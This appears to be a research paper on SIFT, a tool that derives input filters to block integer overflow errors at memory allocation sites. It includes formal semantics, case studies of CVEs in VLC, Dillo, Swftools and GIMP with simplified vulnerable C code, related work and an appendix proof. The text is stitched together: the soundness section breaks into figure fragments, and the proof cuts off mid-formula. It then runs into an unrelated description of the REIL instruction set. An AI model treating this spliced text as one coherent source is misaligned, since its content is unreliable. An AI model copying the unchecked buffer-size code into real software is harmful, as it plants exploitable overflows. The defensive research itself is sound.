Given multiple symbolic conditions generated from multiple critical program points, SIFT can create a single efficient filter that first parses the input, then checks the parsed input against all symbolic conditions in series. This approach amortizes the overhead of reading the input (in practice, reading the input consumes essentially all of the time required to execute the filter, see Figure 15) over all of the symbolic condition checks.

4. Soundness of the Static Analysis

We next formalize our static analysis algorithm on the core language in Figure 4 and discuss the soundness of the analysis. We focus on the intraprocedural analysis and omit a discussion of the interprocedural analysis as it uses standard techniques based on summary tables.

4.1 Dynamic Semantics of the Core Language

Program State: We define the program state (σ, ρ, ς, ρ̄, Inp) as follows:

σ: Var → (Loc + Int + {undef})
ς: Var → Bool
ρ: Loc → (Loc + Int + {undef})
ρ̄: Loc → Bool
Inp: InputField → P(Int)

σ and ρ map variables and memory locations to their corresponding values. We use undef to represent uninitialized values. We define that if any operand of an arithmetic operation is undef, the result of the operation is also undef. Inp represents the input file, which is unchanged during the execution. ς maps each variable to a boolean flag, which tracks whether the computation that generates the value of the variable (including all sub-computations) generates an overflow. ρ̄ maps each memory location to a boolean overflow flag similar to ς. The initial states σ0 and ρ0 map all variables and locations to undef. The initial states ς0 and ρ̄0 map all variables and locations to false. The values of uninitialized variables and memory locations are undefined as per the C language specification standard.

Small Step Rules: Figure 10 presents the small step dynamic semantics of the language.
Note that in Figure 10, overflow(a, b, op) is a function that returns true if and only if the computation a op b causes an overflow. A main point of departure from standard languages is that we also update ς and ρ̄ to track overflow errors during each execution step. For example, the op rule in Figure 10 appropriately updates the overflow flag of x in ς by checking whether the computation that generates the value of x (including the sub-computations that generate the values of y and z) results in an overflow condition.

read: c ∈ Inp(f), σ′ = σ[x → c], ς′ = ς[x → false] ⊢ ⟨l: x = read(f), σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ′, ρ, ς′, ρ̄, Inp⟩
const: σ′ = σ[x → c], ς′ = ς[x → false] ⊢ ⟨l: x = c, σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ′, ρ, ς′, ρ̄, Inp⟩
assign: σ′ = σ[x → σ(y)], ς′ = ς[x → ς(y)] ⊢ ⟨l: x = y, σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ′, ρ, ς′, ρ̄, Inp⟩
malloc: ξ ∈ Loc, ξ is fresh, σ′ = σ[p → ξ], ς′ = ς[p → false] ⊢ ⟨l: p = malloc, σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ′, ρ, ς′, ρ̄, Inp⟩
seq-1: ⟨nil: skip; s, σ, ρ, ς, ρ̄, Inp⟩ → ⟨s, σ, ρ, ς, ρ̄, Inp⟩
seq-2: ⟨s, σ, ρ, ς, ρ̄, Inp⟩ → ⟨s′′, σ′, ρ′, ς′, ρ̄′, Inp⟩ ⊢ ⟨s; s′, σ, ρ, ς, ρ̄, Inp⟩ → ⟨s′′; s′, σ′, ρ′, ς′, ρ̄′, Inp⟩
load: σ(p) = ξ, ξ ∈ Loc, σ′ = σ[x → ρ(ξ)], ς′ = ς[x → ρ̄(ξ)] ⊢ ⟨l: x = ∗p, σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ′, ρ, ς′, ρ̄, Inp⟩
store: σ(p) = ξ, ξ ∈ Loc, ρ′ = ρ[ξ → σ(x)], ρ̄′ = ρ̄[ξ → ς(x)] ⊢ ⟨l: ∗p = x, σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ, ρ′, ς, ρ̄′, Inp⟩
op: σ(y) ∉ Loc, σ(z) ∉ Loc, b = ς(y) ∨ ς(z) ∨ overflow(σ(y), σ(z), op) ⊢ ⟨l: x = y op z, σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ[x → σ(y) op σ(z)], ρ, ς[x → b], ρ̄, Inp⟩
if-t: σ(x) ≠ 0 ⊢ ⟨l: if (x) s else s′, σ, ρ, ς, ρ̄, Inp⟩ → ⟨s, σ, ρ, ς, ρ̄, Inp⟩
if-f: σ(x) = 0 ⊢ ⟨l: if (x) s else s′, σ, ρ, ς, ρ̄, Inp⟩ → ⟨s′, σ, ρ, ς, ρ̄, Inp⟩
while-f: σ(x) = 0 ⊢ ⟨l: while (x) {s}, σ, ρ, ς, ρ̄, Inp⟩ → ⟨nil: skip, σ, ρ, ς, ρ̄, Inp⟩
while-t: σ(x) ≠ 0, s′ = s; l: while (x) {s} ⊢ ⟨l: while (x) {s}, σ, ρ, ς, ρ̄, Inp⟩ → ⟨s′, σ, ρ, ς, ρ̄, Inp⟩

Figure 10. The small step operational semantics of the language. "nil" is a special label reserved by the semantics.

4.2 Soundness of the Pointer Analysis

Our analysis uses an underlying pointer analysis [17] to analyze programs that use pointers. We formally state our assumptions about the soundness of the underlying pointer alias analysis as follows:

Definition 1 (Soundness of no_alias and must_alias). Given a sequence of execution ⟨s0, σ0, ρ0, ς0, ρ̄0⟩ → ⟨s1, σ1, ρ1, ς1, ρ̄1⟩ → ··· and two labels lstore, lload, where lstore is the label for the store statement sstore such that sstore = "lstore: ∗p = x" and lload is the label for the load statement sload such that sload = "lload: x′ = ∗p′", we have: no_alias(lstore, lload) → ∀i, first(si) = lstore, ∀j, first(sj) = lload, i < j → σi(p) ≠ σj(p′).

Dillo: ... ∧ safe(png_width[32] × ((c[32] × sext(png_bitdepth[8], 32)) >> 3[32]) × png_height[32])
GIMP: safe((gif_width[32] × gif_height[32]) × 2[32]) ∧ safe(gif_width[32] × gif_height[32] × 4[32])

Figure 16. The symbolic condition C in bit vector form for VLC, Swftools-png2swf, Swftools-jpeg2swf, Dillo, and GIMP. The superscript indicates the bit width of each expression atom. "sext(v, w)" is the sign extension operation that transforms the value v to the bit width w.

5.3.1 VLC

The VLC wav.c module contains an integer overflow vulnerability (CVE-2008-2430) when parsing WAV sound inputs. Figure 17 presents (a simplified version of) the source code that is related to this error. When VLC parses the format chunk of a WAV input, it first reads the input field fmt_size, which indicates the size of the format chunk (line 6). VLC then allocates a buffer to hold the format chunk (line 14 in Figure 17). A large fmt_size field value (for example, 0xfffffffe) will cause an overflow to occur when VLC computes the buffer size. We annotate the source code to specify where the module reads the fmt_size input field (line 11). SIFT then analyzes the module to obtain the symbolic condition C (Figure 16), which soundly summarizes how VLC computes the buffer size from input fields.

5.3.2 Dillo

Dillo contains an integer overflow vulnerability (CVE-2009-2294) in its png module. Figure 18 presents the simplified source code for this example. Dillo uses the libpng library to read PNG images. The libpng runtime calls png_process_data() (line 2) to process each PNG image.
This function then calls png_push_read_chunk() (line 11) to process each chunk in the PNG image. When the libpng runtime reads the first data chunk (the IDAT chunk), it calls the Dillo callback Png_datainfo_callback() (lines 66-75) in the Dillo PNG processing module. There is an integer overflow vulnerability at line 73 where Dillo calculates the size of the image buffer as png->rowbytes * png->height. On a 32-bit machine, inputs with large width and height fields can cause the image buffer size calculation to overflow. In this case Dillo allocates an image buffer that is smaller than required and eventually writes beyond the end of the allocated buffer. Figure 16 presents the symbolic condition C for Dillo. C soundly takes intermediate computations over all execution paths into consideration, including the switch branch at lines 45-59 that sets the variable png_ptr->channels and the PNG_ROWBYTES macro at lines 26-29. Note that the constant c[32] in C corresponds to the possible values of png_ptr->channels, which are between 1 and 4.

5.3.3 Swftools

Swftools is a set of utilities for creating and manipulating SWF files. Swftools contains two tools, png2swf and jpeg2swf, which transform PNG and JPEG images to SWF files. Each of these two tools contains an integer overflow vulnerability (CVE-2010-1516). Figure 19 presents (a simplified version of) the source code that contains the png2swf vulnerability. When processing PNG images, Swftools calls getPNG() (lines 20-43) at png2swf.c:763 to read the PNG image into memory. getPNG() first calls png_read_header() (lines 1-18) to locate and read the header chunk which contains the PNG metadata. It then uses the metadata information to calculate the length of the image data at png.h:502 (lines 39-40). There is no bounds check on the width and the height values from the header chunk before this calculation. On a 32-bit machine, a PNG image with large width and height values will trigger the integer overflow error.
We annotate, at lines 7 and 10, the statements that read the input fields png_width and png_height and use SIFT to derive the symbolic condition for this vulnerability. Figure 16 presents the symbolic condition C.

 1 // libpng main data process function.
 2 void png_process_data(png_structp png_ptr,
 3                       png_infop info_ptr, ...) {
 4   ...
 5   while (png_ptr->buffer_size) {
 6     // This is a wrapper for png_push_read_chunk
 7     png_process_some_data(png_ptr, info_ptr);
 8   }
 9 }
10 // chunk handler dispatcher
11 void png_push_read_chunk(png_structp png_ptr,
12                          png_infop info_ptr) {
13   if (!png_memcmp(png_ptr->chunk_name, png_IHDR, 4)) {
14     ...
15     png_handle_IHDR(png_ptr, info_ptr, ...);
16   }
17   ...
18   else if (!png_memcmp(png_ptr->chunk_name,
19                        png_IDAT, 4)) {
20     ...
21     // Datainfo callback is called
22     png_push_have_info(png_ptr, info_ptr);
23     ...
24   }
25 }
26 #define PNG_ROWBYTES(pixel_bits, width) \
27   ((pixel_bits) >= 8 ? \
28    ((width) * (((png_uint_32)(pixel_bits)) >> 3)) : \
29    ((((width) * ((png_uint_32)(pixel_bits))) + 7) >> 3))
30 void png_handle_IHDR(png_structp png_ptr,
31                      png_infop info_ptr, ...) {
32   ...
33   // read individual png fields from input buffer
34   width = png_get_uint_31(png_ptr, buf);
35   /* width = SIFT_input("png_width", 32); */
36   height = png_get_uint_31(png_ptr, buf + 4);
37   /* height = SIFT_input("png_height", 32); */
38   bit_depth = buf[8];
39   /* bit_depth = SIFT_input("png_bitdepth", 8); */
40   ...
41   png_ptr->width = width;
42   png_ptr->height = height;
43   png_ptr->bit_depth = (png_byte)bit_depth;
44   ...
45   switch (png_ptr->color_type) {
46     case PNG_COLOR_TYPE_GRAY:
47     case PNG_COLOR_TYPE_PALETTE:
48       png_ptr->channels = 1;
49       break;
50     case PNG_COLOR_TYPE_RGB:
51       png_ptr->channels = 3;
52       break;
53     case PNG_COLOR_TYPE_GRAY_ALPHA:
54       png_ptr->channels = 2;
55       break;
56     case PNG_COLOR_TYPE_RGB_ALPHA:
57       png_ptr->channels = 4;
58       break;
59   }
60   png_ptr->pixel_depth = (png_byte)(
61     png_ptr->bit_depth * png_ptr->channels);
62   png_ptr->rowbytes = PNG_ROWBYTES(
63     png_ptr->pixel_depth, png_ptr->width);
64 }
65 // Dillo datainfo initialization callback
66 static void Png_datainfo_callback(png_structp png_ptr,
67                                   ...) {
68   DilloPng *png;
69   png = png_get_progressive_ptr(png_ptr);
70   ...
71   // where the overflow happens
72   png->image_data = (uchar_t *) dMalloc(
73     png->rowbytes * png->height);
74   ...
75 }

Figure 18. The simplified source code from Dillo and libpng with annotations inside comments.

 1 static int png_read_header(FILE *fi,
 2                            struct png_header *header) {
 3   ...
 4   while (png_read_chunk(&id, &len, &data, fi)) {
 5     if (!strncmp(id, "IHDR", 4)) {
 6       ...
 7       header->width = data[0]<<24 | data[1]<<16 |
 8                       data[2]<<8 | data[3];
 9       /* header->width = SIFT_input("png_width", 32); */
10       header->height = data[4]<<24 | data[5]<<16 |
11                        data[6]<<8 | data[7];
12       /* header->height = SIFT_input("png_height", 32); */
13       ...
14     }
15     ...
16   }
17   ...
18 }
19
20 EXPORT int getPNG(const char *sname, int *destwidth,
21                   int *destheight, unsigned char **destdata) {
22   ...
23   unsigned long int imagedatalen;
24   ...
25   if (!png_read_header(fi, &header)) {
26     fclose(fi);
27     return 0;
28   }
29   ...
30   if (header.mode==3 || header.mode==0) bypp = 1;
31   else if (header.mode == 4) bypp = 2;
32   else if (header.mode == 2) bypp = 3;
33   else if (header.mode == 6) bypp = 4;
34   else {
35     ...
36     return 0;
37   }
38
39   imagedatalen = bypp * header.width *
40                  header.height + 65536;
41   imagedata = (unsigned char *)malloc(imagedatalen);
42   ...
43 }

Figure 19. The simplified source code from png2swf in swftools with annotations inside comments.

jpeg2swf contains a similar integer overflow vulnerability when processing JPEG images. At jpeg2swf.c:171, jpeg2swf first calls the libjpeg API to read the JPEG image. At jpeg2swf.c:173, jpeg2swf then immediately calculates the size of a memory buffer for holding the JPEG file in its own data structure. Because it directly uses the input width and height values in the calculation without range checks, large width and height values may cause overflow errors. Figure 16 presents the symbolic condition C for jpeg2swf.

5.3.4 GIMP

GIMP contains an integer overflow vulnerability (CVE-2012-3481) in its GIF loading plugin file-gif-load.c. When GIMP opens a GIF file, it calls load_image at file-gif-load.c:335 to load the entire GIF file into memory. For each individual image in the GIF file, this function first reads the image metadata information, then calls ReadImage to process the image. At file-gif-load.c:1064, the plugin calculates the size of the image output buffer as a function of the product of the width and height values from the input. Because it uses these values directly without range checks, large height and width fields may cause an integer overflow. In this case GIMP may allocate a buffer smaller than the required size. We annotate the source code based on the GIF specification and use SIFT to derive the symbolic condition for this vulnerability. Figure 16 presents the generated symbolic condition C.

5.4 Discussion

The experimental results highlight the combination of properties that, together, enable SIFT to effectively nullify potential integer overflow errors at memory allocation and block copy sites.
SIFT is efficient enough to deploy in production on real-world modules (the combined program analysis and filter generation times are always under a second), the analysis is precise enough to successfully generate input filters for the majority of memory allocation and block copy sites, the results provide encouraging evidence that the generated filters are precise enough to have few or even no false positives in practice, and the filters execute efficiently enough to deploy with acceptable filtering overhead.

6. Related Work

Weakest Precondition: Madhavan and Komondoor present an approximate weakest precondition analysis to verify the absence of null dereference errors in Java programs [21]. The underlying analysis domain tracks whether or not variables may contain null references. To obtain acceptable precision for the null dereference verification problem, the technique incorporates null-dereference checks from conditional statements into the propagated conditions. Because SIFT focuses on integer overflow errors, the underlying analysis domain (symbolic arithmetic expressions) and propagation rules are significantly more complex. SIFT also does not incorporate checks from conditional statements, a design decision that, for the integer overflow problem, produces efficient and accurate filters. The problems are also different: SIFT generates filters to eliminate security vulnerabilities, while Madhavan and Komondoor focus on verifying the absence of null dereferences. Flanagan and Saxe present a general intraprocedural weakest precondition analysis for generating verification conditions for ESC/Java programs [12]. SIFT differs in that it focuses on integer overflow errors. Because of this focus, SIFT can synthesize its own loop invariants (Flanagan and Saxe rely on developer-provided invariants).
In addition, SIFT is interprocedural, and uses the analysis results to generate sound filters that nullify integer overflow errors.

Anomaly Detection: Anomaly detection techniques generate (unsound) input filters by empirically learning properties of successfully or unsuccessfully processed inputs [14, 16, 19, 23, 25, 26, 30, 31]. Web-based anomaly detection [16, 26] uses input features (e.g., request length and character distributions) from attack-free HTTP traffic to model normal behaviors. HTTP requests that contain features that violate the model are flagged as anomalous and dropped. Similarly, Valeur et al. [30] propose a learning-based approach for detecting SQL-injection attacks. Wang et al. [31] propose a technique that detects network-based intrusions by examining the character distribution in payloads. Perdisci et al. [25] propose a clustering-based anomaly detection technique that learns features from malicious traces (as opposed to benign traces). Input rectification learns properties of inputs that the application processes successfully, then modifies inputs to ensure that they satisfy the learned properties [20]. Two key differences between SIFT and these techniques are that SIFT statically analyzes the application, not its inputs, and takes all execution paths into account to generate a sound filter.

Static Analysis for Finding Integer Errors: Several static analysis tools have been proposed to find integer errors [6, 27, 32]. KINT [32], for example, analyzes individual procedures, with the developer optionally providing procedure specifications that characterize the value ranges of the parameters. KINT also unsoundly avoids the loop invariant synthesis problem by replacing each loop with the loop body (in effect, unrolling the loop once). Despite substantial effort, KINT reports a large number of false positives [32]. SIFT addresses a different problem: it is designed to nullify, not detect, overflow errors.
In pursuit of this goal, it uses an interprocedural analysis, synthesizes symbolic loop invariants, and soundly analyzes all execution paths to produce a sound filter.

Symbolic Test Generation: DART [15] and KLEE [5] use symbolic execution to automatically generate test cases that can expose errors in an application. IntScope [29] and SmartFuzz [22] are symbolic execution systems specifically for finding integer errors. It would be possible to combine these systems with previous input-driven filter generation techniques to obtain filters that discard inputs that take the discovered path to the error. As discussed previously, SIFT differs in that it considers all possible paths, so that its generated filters come with a soundness guarantee: if an input passes the filter, it will not exploit the integer overflow error.

Runtime Check and Library Support: To alleviate the problem of false positives, several research projects have focused on runtime detection tools that dynamically insert runtime checks before integer operations [3, 7, 11, 34]. Another similar technique is to use safe integer libraries such as SafeInt [18] and CERT's IntegerLib [28] to perform sanity checks at runtime. Using these libraries requires that developers rewrite existing code to use safe versions of integer operations. However, the inserted code typically imposes non-negligible overhead. When integer errors happen in the middle of the program execution, these techniques usually raise warnings and terminate the execution, which effectively turns integer overflow attacks into DoS attacks. SIFT, in contrast, inserts no code into the application and blocks inputs that exploit integer overflow vulnerabilities, avoiding the attacks completely.

Benign Integer Overflows: In some cases, developers may intentionally write code that contains benign integer overflows [29, 32].
A potential concern is that techniques that nullify overflows may interfere with the intended behavior of such programs [29, 32]. Because SIFT focuses on critical memory allocation and block copy sites that are unlikely to have such intentional integer overflows, SIFT is unlikely to nullify benign integer overflows and therefore unlikely to interfere with the intended behavior of the program.

7. Conclusion

Integer overflow errors can lead to security vulnerabilities. SIFT analyzes how the application computes integer values that appear at memory allocation and block copy sites to generate input filters that discard inputs that may trigger overflow errors in these computations. Our results show that SIFT can quickly generate efficient and precise input filters for the vast majority of memory allocation and block copy call sites in our analyzed benchmark modules.

References

[1] Hachoir. http://bitbucket.org/haypo/hachoir/wiki/Home.
[2] The LLVM compiler infrastructure. http://www.llvm.org/.
[3] D. Brumley, T. Chiueh, R. Johnson, H. Lin, and D. Song. RICH: Automatically protecting against integer-based vulnerabilities. Department of Electrical and Computing Engineering, page 28, 2007.
[4] D. Brumley, H. Wang, S. Jha, and D. Song. Creating vulnerability signatures using weakest preconditions. In Proceedings of the 20th IEEE Computer Security Foundations Symposium, CSF ’07, pages 311–325, Washington, DC, USA, 2007. IEEE Computer Society.
[5] C. Cadar, D. Dunbar, and D. Engler. KLEE: unassisted and automatic generation of high-coverage tests for complex systems programs. In Proceedings of the 8th USENIX Conference on Operating Systems Design and Implementation, OSDI ’08, pages 209–224, Berkeley, CA, USA, 2008. USENIX Association.
[6] E. Ceesay, J. Zhou, M. Gertz, K. Levitt, and M. Bishop. Using type qualifiers to analyze untrusted integers and detecting security flaws in C programs.
Detection of Intrusions and Malware & Vulnerability Assessment, pages 1–16, 2006.
[7] R. Chinchani, A. Iyer, B. Jayaraman, and S. Upadhyaya. ARCHERR: Runtime environment driven program safety. Computer Security–ESORICS 2004, pages 385–406, 2004.
[8] M. Costa, M. Castro, L. Zhou, L. Zhang, and M. Peinado. Bouncer: securing software by blocking bad input. In Proceedings of the Twenty-first ACM SIGOPS Symposium on Operating Systems Principles, SOSP ’07. ACM, 2007.
[9] M. Costa, J. Crowcroft, M. Castro, A. Rowstron, L. Zhou, L. Zhang, and P. Barham. Vigilante: end-to-end containment of internet worms. In Proceedings of the Twentieth ACM Symposium on Operating Systems Principles, SOSP ’05. ACM, 2005.
[10] W. Cui, M. Peinado, and H. J. Wang. ShieldGen: Automatic data patch generation for unknown vulnerabilities with informed probing. In Proceedings of the 2007 IEEE Symposium on Security and Privacy. IEEE Computer Society, 2007.
[11] W. Dietz, P. Li, J. Regehr, and V. Adve. Understanding integer overflow in C/C++. In Proceedings of the 2012 International Conference on Software Engineering, pages 760–770. IEEE Press, 2012.
[12] C. Flanagan and J. B. Saxe. Avoiding exponential explosion: generating compact verification conditions. In Proceedings of the 28th ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, POPL ’01, pages 193–205, New York, NY, USA, 2001. ACM.
[13] V. Ganesh, T. Leek, and M. Rinard. Taint-based directed whitebox fuzzing. In ICSE ’09: Proceedings of the 31st International Conference on Software Engineering. IEEE Computer Society, 2009.
[14] D. Gao, M. K. Reiter, and D. Song. On gray-box program tracking for anomaly detection. In Proceedings of the 13th Conference on USENIX Security Symposium - Volume 13, SSYM ’04. USENIX Association, 2004.
[15] P. Godefroid, N. Klarlund, and K. Sen. DART: directed automated random testing.
In Proceedings of the 2005 ACM SIGPLAN Conference on Programming Language Design and Implementation, PLDI ’05, pages 213–223, New York, NY, USA, 2005. ACM.
[16] C. Kruegel and G. Vigna. Anomaly detection of web-based attacks. In Proceedings of the 10th ACM Conference on Computer and Communications Security, CCS ’03. ACM, 2003.
[17] C. Lattner, A. Lenharth, and V. Adve. Making context-sensitive points-to analysis with heap cloning practical for the real world. In Proceedings of the 2007 ACM SIGPLAN Conference on Programming Language Design and Implementation, PLDI ’07, pages 278–289, New York, NY, USA, 2007. ACM.
[18] D. LeBlanc. Integer handling with the C++ SafeInt class. http://msdn.microsoft.com/en-us/library/ms972705, 2004.
[19] F. Long, V. Ganesh, M. Carbin, S. Sidiroglou, and M. Rinard. Automatic input rectification. ICSE ’12, 2012.
[20] F. Long, V. Ganesh, M. Carbin, S. Sidiroglou, and M. Rinard. Automatic input rectification. In Proceedings of the 2012 International Conference on Software Engineering, ICSE 2012, pages 80–90, Piscataway, NJ, USA, 2012. IEEE Press.
[21] R. Madhavan and R. Komondoor. Null dereference verification via over-approximated weakest pre-conditions analysis. In Proceedings of the 2011 ACM International Conference on Object Oriented Programming Systems Languages and Applications, OOPSLA ’11, pages 1033–1052, New York, NY, USA, 2011. ACM.
[22] D. Molnar, X. C. Li, and D. A. Wagner. Dynamic test generation to find integer bugs in x86 binary Linux programs. USENIX Security ’09.
[23] D. Mutz, F. Valeur, C. Kruegel, and G. Vigna. Anomalous system call detection. ACM Transactions on Information and System Security, 9, 2006.
[24] J. Newsome, D. Brumley, and D. X. Song. Vulnerability-specific execution filtering for exploit prevention on commodity software. In NDSS, 2006.
[25] R. Perdisci, W. Lee, and N. Feamster.
Behavioral clustering of HTTP-based malware and signature generation using malicious network traces. In Proceedings of the 7th USENIX Conference on Networked Systems Design and Implementation, NSDI ’10. USENIX Association, 2010.
[26] W. Robertson, G. Vigna, C. Kruegel, and R. A. Kemmerer. Using generalization and characterization techniques in the anomaly-based detection of web attacks. In Proceedings of the 13th Symposium on Network and Distributed System Security (NDSS), 2006.
[27] D. Sarkar, M. Jagannathan, J. Thiagarajan, and R. Venkatapathy. Flow-insensitive static analysis for detecting integer anomalies in programs. In IASTED, 2007.
[28] R. Seacord. The CERT C Secure Coding Standard. Addison-Wesley Professional, 2008.
[29] W. Tielei, W. Tao, L. Zhiqiang, and Z. Wei. IntScope: Automatically Detecting Integer Overflow Vulnerability in X86 Binary Using Symbolic Execution. In 16th Annual Network & Distributed System Security Symposium, 2009.
[30] F. Valeur, D. Mutz, and G. Vigna. A learning-based approach to the detection of SQL attacks. In DIMVA 2005, 2005.
[31] K. Wang and S. J. Stolfo. Anomalous payload-based network intrusion detection. In RAID, 2004.
[32] X. Wang, H. Chen, Z. Jia, N. Zeldovich, and M. Kaashoek. Improving integer security for systems with KINT. In OSDI. USENIX Association, 2012.
[33] X. Wang, Z. Li, J. Xu, M. K. Reiter, C. Kil, and J. Y. Choi. Packet vaccine: black-box exploit detection and signature generation. CCS ’06. ACM, 2006.
[34] C. Zhang, T. Wang, T. Wei, Y. Chen, and W. Zou. IntPatch: Automatically fix integer-overflow-to-buffer-overflow vulnerability at compile-time. Computer Security–ESORICS 2010, pages 71–86, 2010.

A.
Proof Sketch of the Relationship between the Original Semantics and the Abstract Semantics

A.1 The Alias Analyses and the Abstract Semantics

In order to prove the above relationship between the original semantics and the abstract semantics, we introduce the following lemma that states the property between alias relationships and the abstract semantics.

Lemma 5. Given an execution trace ⟨s0, σ̄0, ς̄0, h̄0⟩ →a ⟨s1, σ̄1, ς̄1, h̄1⟩ →a ··· in the abstract semantics, we have ∀i, first(si) = l, left(si) = "l: ∗p = x", ∀j, i < j, ... The proof proceeds by induction on n. Consider the case n > 0. If first(sn−1) ∉ StoreLabel, then based on the small step rules of the semantics, h̄n−1 = h̄n. It is straightforward to apply the induction rule to prove the condition. If first(sn−1) ∈ StoreLabel and sn−1 = "l: ∗p′ = x′", based on the induction, what we need to prove is the case where j = n: ∀i, first(si) = l, left(si) = "l: ∗p = x", i < n, ... For n > 0, we already have σ̄0, ..., σ̄n−1, ς̄0, ..., ς̄n−1, h̄0, ..., h̄n−1 that satisfy the conditions by the induction rule. We first construct σ̄n, ς̄n, and h̄n using the corresponding small step rule in the abstract semantics, and then prove that the construction satisfies the conditions.

Condition 1: If first(sn−1) ∉ LoadLabel, the proof is straightforward. For example, if first(sn−1) = l, left(sn−1) = "l: x = y op z", based on the small step rule of the original semantics we know that:

σn = σn−1[x → σn−1(y) op σn−1(z)]
ςn = ςn−1[x → ςn−1(y) ∨ ςn−1(z) ∨ overflow(σn−1(y), σn−1(z), op)]

and we can construct using the corresponding rule in the abstract semantics:

σ̄n = σ̄n−1[x → σ̄n−1(y) op σ̄n−1(z)]
ς̄n = ς̄n−1[x → ς̄n−1(y) ∨ ς̄n−1(z) ∨ overflow(σ̄n−1(y), σ̄n−1(z), op)]

By the induction rule we have ∀v ∈ Var, σ̄n−1(v) ∈ Int → σ̄n−1(v) = σn−1(v), so it is easy to show that:

∀v ∈ Var, v ≠ x, σ̄n(v) ∈ Int → σ̄n(v) = σn(v)

Also consider

σ̄n(x) ∈ Int → (σ̄n−1(y) ∈ Int ∧ σ̄n−1(z) ∈ Int) → (σ̄n−1(y) = σn−1(y) ∧ σ̄n−1(z) = σn−1(z)) → ((σ̄n−1(y) op σ̄n−1(z)) = (σn−1(y) op σn−1(z))) → (σ̄n(x) = σn(x))

We can do the proof similarly for ς and ς̄. Therefore Condition 1 holds.
If first(sn−1) ∈ LoadLabel and left(sn−1) = "l: x = ∗p", based on the semantic rules of the load statement, we know that:

σn = σn−1[x → ρn−1(σn−1(p))]
ςn = ςn−1[x → ρ̄n−1(σn−1(p))]

From the induction rule of Condition 2, we know that: ρn−1(σn−1(p)) ∈ Int → (ρn−1(σn−1(p)), ρ̄n−1(σn−1(p))) ∈ h̄(l). Therefore, if ρn−1(σn−1(p)) ∈ Int, it is possible to construct σ̄n and ς̄n as follows based on the abstract semantic rule of the load statement:

σ̄n = σ̄n−1[x → ρn−1(σn−1(p))]
ς̄n = ς̄n−1[x → ρ̄n−1(σn−1(p))]

From the induction rule of Condition 1, we know that σ̄n−1 = σn−1 and ς̄n−1 = ςn−1. These facts together are enough to show that Condition 1 holds.

Condition 2: If first(sn) ∉ LoadLabel, the proof is trivial by using the induction rule. Next we are going to sketch the proof of Condition 2 when first(sn) ∈ LoadLabel and left(sn) = "l: x = ∗p". We try to find a program state ⟨sm, σm, ρm, ςm, ρ̄m⟩ in prior execution steps, such that m < n, first(sm) = l′, left(sm) = "l′: ∗p′ = x′", σm(p′) = σn(p), and ∀m

(e.g., t0, t1, ..., t123, ...), native registers from the source architecture of an analyzed program can also show up as operands of REIL instructions. This does not limit the platform independence of REIL code, as REIL registers and source architecture registers are treated completely uniformly in REIL analysis algorithms. Native registers are simply used in REIL code to make it easier to relate the results of an analysis algorithm back to the original input code. The last REIL instruction operand type is the subaddress. Operands of this type are comparable to integer literals, but instead of integral values these operands always hold addresses of REIL instructions. Furthermore, this operand type can only appear as the third operand of JCC (conditional jump) instructions. Operands of this type are only generated when an original native assembly instruction is translated into a series of REIL instructions that contain branches arising from decisions or loops.
Examples for such instructions are the prefixed string operations (rep stos, ...) of the x86 instruction set, which are translated to REIL instructions that form a loop. Except for their type and their value, REIL operands are characterized by their size. This size is equal to the maximum size of the operand value. REIL operand sizes have names like b1, b2, b4, and so on, meaning that the size of the operand is 1 byte, 2 bytes, and 4 bytes respectively. For example, the integer literal operand 0x17/b2 is really two bytes large and could also be represented as 0x0017/b2, while the size of the register t0 in the operand t0/b4 is 32 bits. In addition to its operands, all REIL instructions can come with so-called meta-data. This meta-data is simply a map of key-value pairs that gives additional information about an instruction that is probably important during static code analysis. (Footnote 2: The one exception is the jump instruction JCC, where the third operand is the jump target.) In general, the number of pieces of meta-data associated with an instruction is not limited, but in practice most REIL instructions do not have any meta-data associated with them at all. In the current version of REIL there is only one kind of meta-data. Jump instructions that were generated during the translation of a subfunction call (like call on the x86 CPU or bl on PowerPC) are specifically marked with the key isCall and the value true. This is necessary because subfunction calls need to be treated very differently than conditional jumps during many static code analysis algorithms. The 17 different REIL instructions can be grouped into a few different instruction groups. The biggest group is formed by the arithmetic instructions, such as addition and subtraction.
Then there are the bitwise instructions that perform operations like bitwise OR and AND; the conditional instructions that are used to compare values and jump according to the result of the comparison; the data transfer instructions that access REIL memory and transfer the content of registers; and the remaining instructions, which do not really fall into any group.

2.1 The arithmetic instructions

With six members, the group of arithmetic instructions covers more than one third of the total instructions of the REIL instruction set.

•ADD: Addition of two values
•SUB: Subtraction of two values
•MUL: Unsigned multiplication of two values
•DIV: Unsigned division of two values
•MOD: Unsigned modulo of two values
•BSH: Logical shift operation

ADD and SUB work exactly like standard addition and subtraction on most platforms. The multiplicative instructions MUL, DIV, and MOD interpret all of their input operands in an unsigned way. The REIL instruction set does not contain signed counterparts of these instructions because signed multiplication and division can easily be simulated in terms of unsigned multiplication and division. The logical shift operation can be used either as a left shift or a right shift, depending on the sign of its second operand. If the second operand is positive, the shift operation is a left shift. If it is negative, the shift operation is a right shift. Arithmetic shifts do not exist in the REIL instruction set because arithmetic shifts can easily be simulated with the help of logical shifts. As in the case of the multiplicative instructions, keeping the REIL instruction set small was more important than adding the convenience of having more expressive REIL translations. Figure 1 shows examples of all arithmetic instructions. The structure of all arithmetic instructions is the same. The first two operands are the input operands of the operation while the third operand is the output operand where the result of the operation is stored.
The order of the input operands is the natural order generally used when writing the operations in infix notation on paper or in the source code of computer programs. For example, the first operand of the SUB operation is the minuend while the second operand is the subtrahend. In the DIV operation the first operand is the dividend and the second operand is the divisor.

ADD t0/b4, t1/b4, t2/b8
SUB t7/b4, t9/b4, t12/b8
MUL t8/b4, 4/b4, t9/b8
DIV 4000/b4, t2/b4, t3/b4
MOD t8/b4, 8/b4, t4/b4
BSH t1/b4, 2/b4, t2/b8

Figure 1: Examples of the arithmetic REIL instructions

Another important aspect of REIL is also first shown in Figure 1: potential overflows in the results of operations are handled explicitly. If an operation can overflow, the output operand must be large enough to store the whole result including the overflow. This is why the output operands of the example instructions are twice as large as their input operands (see footnote 3). The two exceptions are the output operands of the DIV and MOD instructions. Since the results of these operations can never be larger than the first input operand, an extension of the size of the output operand is not necessary; the output operand has the size of the input operand instead.

